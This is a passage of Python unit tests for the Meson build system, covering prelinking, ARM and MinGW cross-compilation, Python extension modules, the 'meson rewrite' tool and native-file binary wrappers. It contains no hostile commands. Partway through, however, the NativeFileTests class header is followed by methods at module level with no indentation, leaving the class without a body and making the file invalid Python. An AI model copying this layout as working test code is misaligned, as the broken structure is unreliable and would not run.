    if is_osx():
        raise unittest.SkipTest('Prelinking not supported on Darwin.')
    if 'clang' in os.environ.get('CC', 'dummy'):
        raise unittest.SkipTest('Prelinking not supported with Clang.')
    # NOTE(review): assumes plain 'cc' matches the compiler meson picks;
    # '7.5.0' identifies the GCC shipped on Ubuntu Bionic.
    gccver = subprocess.check_output(['cc', '--version'])
    if b'7.5.0' in gccver:
        raise unittest.SkipTest('GCC on Bionic is too old to be supported.')
    testdir = os.path.join(self.unit_test_dir, '87 prelinking')
    self.init(testdir)
    self.build()
    outlib = os.path.join(self.builddir, 'libprelinked.a')
    ar = shutil.which('ar')
    self.assertTrue(os.path.exists(outlib))
    self.assertTrue(ar is not None)
    # The prelinked archive must contain exactly one combined object
    # file whose name ends in -prelink.o.
    p = subprocess.run([ar, 't', outlib],
                       stdout=subprocess.PIPE,
                       stderr=subprocess.DEVNULL,
                       universal_newlines=True, timeout=1)
    obj_files = p.stdout.strip().split('\n')
    self.assertEqual(len(obj_files), 1)
    self.assertTrue(obj_files[0].endswith('-prelink.o'))
class BaseLinuxCrossTests(BasePlatformTests):
    """Common base for the Linux cross-compilation test suites below."""

    # Don't pass --libdir when cross-compiling. We have tests that
    # check whether meson auto-detects it correctly.
    libdir = None
def should_run_cross_arm_tests():
    """Truthy when an ARM cross compiler is installed and the host itself
    is not an ARM machine (cross-compiling to the host arch is pointless)."""
    cross_cc = shutil.which('arm-linux-gnueabihf-gcc')
    host_is_arm = platform.machine().lower().startswith('arm')
    return cross_cc and not host_is_arm
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BaseLinuxCrossTests):
    '''
    Tests that cross-compilation to Linux/ARM works
    '''

    def setUp(self):
        # Every test in this class configures with the ubuntu-armhf cross file.
        super().setUp()
        src_root = os.path.dirname(__file__)
        self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')

    def test_cflags_cross_environment_pollution(self):
        '''
        Test that the CFLAGS environment variable does not pollute the cross
        environment. This can't be an ordinary test case because we need to
        inspect the compiler database.
        '''
        testdir = os.path.join(self.common_test_dir, '3 static')
        self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
        compdb = self.get_compdb()
        self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])

    def test_cross_file_overrides_always_args(self):
        '''
        Test that $lang_args in cross files always override get_always_args().
        Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
        architectures such as some Android versions and Raspbian.
        https://github.com/mesonbuild/meson/issues/3049
        https://github.com/mesonbuild/meson/issues/3089
        '''
        testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
        self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
        self.init(testdir)
        compdb = self.get_compdb()
        self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
        self.build()

    def test_cross_libdir(self):
        # When cross compiling "libdir" should default to "lib"
        # rather than "lib/x86_64-linux-gnu" or something like that.
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        self.init(testdir)
        for i in self.introspect('--buildoptions'):
            if i['name'] == 'libdir':
                self.assertEqual(i['value'], 'lib')
                return
        self.assertTrue(False, 'Option libdir not in introspect data.')

    def test_cross_libdir_subproject(self):
        # Guard against a regression where calling "subproject"
        # would reset the value of libdir to its default value.
        testdir = os.path.join(self.unit_test_dir, '76 subdir libdir')
        self.init(testdir, extra_args=['--libdir=fuf'])
        for i in self.introspect('--buildoptions'):
            if i['name'] == 'libdir':
                self.assertEqual(i['value'], 'fuf')
                return
        self.assertTrue(False, 'Libdir specified on command line gets reset.')

    def test_std_remains(self):
        # C_std defined in project options must be in effect also when cross compiling.
        testdir = os.path.join(self.unit_test_dir, '51 noncross options')
        self.init(testdir)
        compdb = self.get_compdb()
        self.assertRegex(compdb[0]['command'], '-std=c99')
        self.build()

    @skipIfNoPkgconfig
    def test_pkg_config_option(self):
        # Needs a host (cross) pkg-config in addition to the build one.
        if not shutil.which('arm-linux-gnueabihf-pkg-config'):
            raise unittest.SkipTest('Cross-pkgconfig not found.')
        testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
        self.init(testdir, extra_args=[
            '-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
            '-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
        ])

    def test_run_native_test(self):
        '''
        https://github.com/mesonbuild/meson/issues/7997
        check run native test in crossbuild without exe wrapper
        '''
        testdir = os.path.join(self.unit_test_dir, '88 run native test')
        stamp_file = os.path.join(self.builddir, 'native_test_has_run.stamp')
        self.init(testdir)
        self.build()
        # The stamp is only written by actually running the native test.
        self.assertPathDoesNotExist(stamp_file)
        self.run_tests()
        self.assertPathExists(stamp_file)
def should_run_cross_mingw_tests():
    """Truthy when a MinGW-w64 cross compiler is installed and the host is
    neither native Windows nor Cygwin."""
    cross_cc = shutil.which('x86_64-w64-mingw32-gcc')
    host_is_windowsish = is_windows() or is_cygwin()
    return cross_cc and not host_is_windowsish
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BaseLinuxCrossTests):
    '''
    Tests that cross-compilation to Windows/MinGW works
    '''

    def setUp(self):
        # Every test in this class configures with the mingw-w64 cross file.
        super().setUp()
        src_root = os.path.dirname(__file__)
        self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')

    def test_exe_wrapper_behaviour(self):
        '''
        Test that an exe wrapper that isn't found doesn't cause compiler sanity
        checks and compiler checks to fail, but causes configure to fail if it
        requires running a cross-built executable (custom_target or run_target)
        and causes the tests to be skipped if they are run.
        '''
        testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
        # Configures, builds, and tests fine by default
        self.init(testdir)
        self.build()
        self.run_tests()
        self.wipe()
        os.mkdir(self.builddir)
        # Change cross file to use a non-existing exe_wrapper and it should fail
        self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
        # Force tracebacks so we can detect them properly
        env = {'MESON_FORCE_BACKTRACE': '1'}
        error_message = "An exe_wrapper is needed but was not found. Please define one in cross file and check the command and/or add it to PATH."

        with self.assertRaises(MesonException) as cm:
            # Must run in-process or we'll get a generic CalledProcessError
            self.init(testdir, extra_args='-Drun-target=false',
                      inprocess=True,
                      override_envvars=env)
        self.assertEqual(str(cm.exception), error_message)

        with self.assertRaises(MesonException) as cm:
            # Must run in-process or we'll get a generic CalledProcessError
            self.init(testdir, extra_args='-Dcustom-target=false',
                      inprocess=True,
                      override_envvars=env)
        self.assertEqual(str(cm.exception), error_message)

        # With both targets disabled nothing needs the wrapper at
        # configure/build time, so this must succeed.
        self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
                  override_envvars=env)
        self.build()

        with self.assertRaises(MesonException) as cm:
            # Must run in-process or we'll get a generic CalledProcessError
            self.run_tests(inprocess=True, override_envvars=env)
        self.assertEqual(str(cm.exception),
                         "The exe_wrapper defined in the cross file 'broken' was not found. Please check the command and/or add it to PATH.")

    @skipIfNoPkgconfig
    def test_cross_pkg_config_option(self):
        # build.pkg_config_path and pkg_config_path must apply to the
        # build and host machines respectively.
        testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
        self.init(testdir, extra_args=[
            '-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
            '-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
        ])
class PythonTests(BasePlatformTests):
    '''
    Tests that verify compilation of python extension modules
    '''

    def test_versions(self):
        # Building extension modules is only wired up for the ninja backend.
        if self.backend is not Backend.ninja:
            raise unittest.SkipTest(f'Skipping python tests with {self.backend.name} backend')

        testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')

        # No python version specified, this will use meson's python
        self.init(testdir)
        self.build()
        self.run_tests()
        self.wipe()

        # When specifying a known name, (python2 / python3) the module
        # will also try 'python' as a fallback and use it if the major
        # version matches
        try:
            self.init(testdir, extra_args=['-Dpython=python2'])
            self.build()
            self.run_tests()
        except unittest.SkipTest:
            # python2 is not necessarily installed on the test machine,
            # if it is not, or the python headers can't be found, the test
            # will raise MESON_SKIP_TEST, we could check beforehand what version
            # of python is available, but it's a bit of a chicken and egg situation,
            # as that is the job of the module, so we just ask for forgiveness rather
            # than permission.
            pass
        self.wipe()

        for py in ('pypy', 'pypy3'):
            try:
                self.init(testdir, extra_args=['-Dpython=%s' % py])
            except unittest.SkipTest:
                # Same as above, pypy2 and pypy3 are not expected to be present
                # on the test system, the test project only raises in these cases
                continue

            # We have a pypy, this is expected to work
            self.build()
            self.run_tests()
            self.wipe()

        # The test is configured to error out with MESON_SKIP_TEST
        # in case it could not find python
        with self.assertRaises(unittest.SkipTest):
            self.init(testdir, extra_args=['-Dpython=not-python'])
        self.wipe()

        # While dir is an external command on both Windows and Linux,
        # it certainly isn't python
        with self.assertRaises(unittest.SkipTest):
            self.init(testdir, extra_args=['-Dpython=dir'])
        self.wipe()
class RewriterTests(BasePlatformTests):
    """Tests for the 'meson rewrite' command-line tool.

    Each test copies a rewrite test project into the build directory,
    runs rewrite commands against it and compares the JSON the rewriter
    prints on stderr with the expected structure.
    """

    def setUp(self):
        super().setUp()
        # Always show full dict diffs; the expected structures are large.
        self.maxDiff = None

    def prime(self, dirname):
        """Copy the named rewrite test project into the build directory."""
        copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)

    def rewrite_raw(self, directory, args):
        """Run 'meson rewrite' with *args* and return its parsed JSON output.

        Raises SkipTest when the project requests skipping and
        CalledProcessError on any other failure.
        """
        if isinstance(args, str):
            args = [args]
        command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
        p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                           universal_newlines=True, timeout=60)
        print('STDOUT:')
        print(p.stdout)
        print('STDERR:')
        print(p.stderr)
        if p.returncode != 0:
            if 'MESON_SKIP_TEST' in p.stdout:
                raise unittest.SkipTest('Project requested skipping.')
            raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
        # The machine-readable result is emitted on stderr.
        if not p.stderr:
            return {}
        return json.loads(p.stderr)

    def rewrite(self, directory, args):
        """Run a rewrite 'command' operation and return its JSON output."""
        if isinstance(args, str):
            args = [args]
        return self.rewrite_raw(directory, ['command'] + args)

    def test_target_source_list(self):
        self.prime('1 basic')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'target': {
                'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
            }
        }
        self.assertDictEqual(out, expected)

    def test_target_add_sources(self):
        self.prime('1 basic')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
        expected = {
            'target': {
                'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
                'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
            }
        }
        self.assertDictEqual(out, expected)

        # Check the written file
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        self.assertDictEqual(out, expected)

    def test_target_add_sources_abs(self):
        self.prime('1 basic')
        abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
        add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
        inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
        self.rewrite(self.builddir, add)
        out = self.rewrite(self.builddir, inf)
        expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
        self.assertDictEqual(out, expected)

    def test_target_remove_sources(self):
        self.prime('1 basic')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
        expected = {
            'target': {
                'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
                'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
                'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
            }
        }
        self.assertDictEqual(out, expected)

        # Check the written file
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        self.assertDictEqual(out, expected)

    def test_target_subdir(self):
        self.prime('2 subdirs')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
        expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
        self.assertDictEqual(list(out['target'].values())[0], expected)

        # Check the written file
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        self.assertDictEqual(list(out['target'].values())[0], expected)

    def test_target_remove(self):
        self.prime('1 basic')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'target': {
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
            }
        }
        self.assertDictEqual(out, expected)

    def test_target_add(self):
        # Renamed from 'test_tatrget_add' to fix the typo in the name;
        # unittest still discovers it via the test_ prefix.
        self.prime('1 basic')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'target': {
                'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
            }
        }
        self.assertDictEqual(out, expected)

    def test_target_remove_subdir(self):
        self.prime('2 subdirs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        self.assertDictEqual(out, {})

    def test_target_add_subdir(self):
        self.prime('2 subdirs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
        self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)

    def test_target_source_sorting(self):
        self.prime('5 sorting')
        add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
        inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
        out = self.rewrite(self.builddir, add_json)
        out = self.rewrite(self.builddir, inf_json)
        # Sources must come out naturally sorted (a10 after a2), grouped
        # by directory first.
        expected = {
            'target': {
                'exe1@exe': {
                    'name': 'exe1',
                    'sources': [
                        'aaa/a/a1.c',
                        'aaa/b/b1.c',
                        'aaa/b/b2.c',
                        'aaa/f1.c',
                        'aaa/f2.c',
                        'aaa/f3.c',
                        'bbb/a/b1.c',
                        'bbb/b/b2.c',
                        'bbb/c1/b5.c',
                        'bbb/c2/b7.c',
                        'bbb/c10/b6.c',
                        'bbb/a4.c',
                        'bbb/b3.c',
                        'bbb/b4.c',
                        'bbb/b5.c',
                        'a1.c',
                        'a2.c',
                        'a3.c',
                        'a10.c',
                        'a20.c',
                        'a30.c',
                        'a100.c',
                        'a101.c',
                        'a110.c',
                        'a210.c',
                        'a666.c',
                        'b1.c',
                        'c2.c'
                    ]
                }
            }
        }
        self.assertDictEqual(out, expected)

    def test_target_same_name_skip(self):
        self.prime('4 same name targets')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {'name': 'myExe', 'sources': ['main.cpp']}
        self.assertEqual(len(out['target']), 2)
        for val in out['target'].values():
            self.assertDictEqual(expected, val)

    def test_kwargs_info(self):
        self.prime('3 kwargs')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1'},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_set(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
                'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
                'dependency#dep1': {'required': True, 'method': 'cmake'}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_add(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD', 'Boost']},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_remove(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'license': 'GPL'},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_remove_regex(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'default_options': 'debug=true'},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_delete(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {},
                'target#tgt1': {},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_default_options_set(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_default_options_delete(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
    # current_config / current_wrapper are counters used to give each
    # generated native file and binary wrapper a unique name.
    super().setUp()
    self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
    self.current_config = 0
    self.current_wrapper = 0
def helper_create_native_file(self, values):
    """Create a config file as a temporary file.

    values should be a nested dictionary structure of {section: {key:
    value}}
    """
    config_path = os.path.join(self.builddir, f'generated{self.current_config}.config')
    self.current_config += 1

    def fmt(value):
        # Booleans and numbers are written bare, lists as quoted arrays,
        # everything else as a single-quoted string.
        if isinstance(value, (bool, int, float)):
            return f'{value}'
        if isinstance(value, list):
            return '[{}]'.format(', '.join([f"'{item}'" for item in value]))
        return f"'{value}'"

    lines = []
    for section, entries in values.items():
        lines.append(f'[{section}]\n')
        for key, value in entries.items():
            lines.append(f'{key}={fmt(value)}\n')
    with open(config_path, 'wt') as f:
        f.writelines(lines)
    return config_path
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
    """Creates a wrapper around a binary that overrides specific values.

    The wrapper is a generated python script: for each key of *extra_args*
    and *kwargs* it accepts a --<key> flag that prints the configured value
    (to stdout, or to the stream named by kwargs['outfile']) and exits;
    any other invocation is forwarded to *binary*.  Returns the path of
    the executable to invoke (on Windows a .bat shim around the script).
    """
    filename = os.path.join(dir_ or self.builddir, f'binary_wrapper{self.current_wrapper}.py')
    extra_args = extra_args or {}
    self.current_wrapper += 1
    if is_haiku():
        chbang = '#!/bin/env python3'
    else:
        chbang = '#!/usr/bin/env python3'

    with open(filename, 'wt') as f:
        f.write(textwrap.dedent('''\
            {}
            import argparse
            import subprocess
            import sys

            def main():
                parser = argparse.ArgumentParser()
            '''.format(chbang)))
        for name in chain(extra_args, kwargs):
            f.write('    parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
        f.write('    args, extra_args = parser.parse_known_args()\n')
        for name, value in chain(extra_args.items(), kwargs.items()):
            f.write(f'    if args.{name}:\n')
            f.write('        print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
            f.write('        sys.exit(0)\n')
        # The subprocess fallback is indented one level deeper than the
        # __main__ guard so that after dedent() it lands inside main().
        f.write(textwrap.dedent('''
                ret = subprocess.run(
                    ["{}"] + extra_args,
                    stdout=subprocess.PIPE,
                    stderr=subprocess.PIPE)
                print(ret.stdout.decode('utf-8'))
                print(ret.stderr.decode('utf-8'), file=sys.stderr)
                sys.exit(ret.returncode)

            if __name__ == '__main__':
                main()
            '''.format(binary)))
    if not is_windows():
        os.chmod(filename, 0o755)
        return filename

    # On windows we need yet another level of indirection, as cmd cannot
    # invoke python files itself, so instead we generate a .bat file, which
    # invokes our python wrapper
    batfile = os.path.join(self.builddir, f'binary_wrapper{self.current_wrapper}.bat')
    with open(batfile, 'wt') as f:
        # FIX: pass the generated python wrapper's path to the interpreter;
        # this previously wrote a literal placeholder instead of {filename},
        # so the .bat shim never invoked the wrapper script.
        f.write(fr'@{sys.executable} {filename} %*')
    return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
    """Helper for generating tests for overriding compilers for languages
    with more than one implementation, such as C, C++, ObjC, ObjC++, and D.

    cb receives the originally detected compiler and returns a tuple of
    (binary name to force, expected new compiler id).
    """
    env = get_fake_env()
    getter = getattr(env, f'detect_{lang}_compiler')
    getter = functools.partial(getter, for_machine)
    cc = getter()
    binary, newid = cb(cc)
    # Override the binary table entry and re-run detection.
    env.binaries[for_machine].binaries[lang] = binary
    compiler = getter()
    self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
    # When the same binary is configured in several native files, the
    # file given last on the command line wins.
    wrapper = self.helper_create_binary_wrapper('bash', version='foo')
    config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
    wrapper = self.helper_create_binary_wrapper('bash', version='12345')
    config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
    self.init(self.testcase, extra_args=[
        '--native-file', config, '--native-file', config2,
        '-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
    """A native file passed as a fifo (pipe) must be read like a regular
    file."""
    fifo = os.path.join(self.builddir, 'native.file')
    os.mkfifo(fifo)
    with tempfile.TemporaryDirectory() as d:
        wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')

        def filler():
            # Opening a fifo for writing blocks until the reader (meson)
            # opens the other end, hence the helper thread.
            with open(fifo, 'w') as f:
                f.write('[binaries]\n')
                f.write(f"bash = '{wrapper}'\n")

        thread = threading.Thread(target=filler)
        thread.start()
        self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
        thread.join()
        os.unlink(fifo)
        self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
    """Several native files may be passed at once, each overriding a
    different binary."""
    bash_wrapper = self.helper_create_binary_wrapper('bash', version='12345')
    bash_config = self.helper_create_native_file({'binaries': {'bash': bash_wrapper}})
    python_wrapper = self.helper_create_binary_wrapper('python')
    python_config = self.helper_create_native_file({'binaries': {'python': python_wrapper}})
    args = []
    for native_file in (bash_config, python_config):
        args += ['--native-file', native_file]
    args.append('-Dcase=find_program')
    self.init(self.testcase, extra_args=args)
def _simple_test(self, case, binary, entry=None):
    """Run the '47 native file binary' project for one case, overriding
    *entry* (defaults to *binary*) with a wrapper reporting version 12345."""
    wrapped_binary = self.helper_create_binary_wrapper(binary, version='12345')
    override = {entry or binary: wrapped_binary}
    native_file = self.helper_create_native_file({'binaries': override})
    self.init(self.testcase, extra_args=['--native-file', native_file, f'-Dcase={case}'])
def test_find_program(self):
    # find_program() must honor the native-file 'bash' override.
    self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
    # Do the skip at this level to avoid screwing up the cache
    if mesonbuild.environment.detect_msys2_arch():
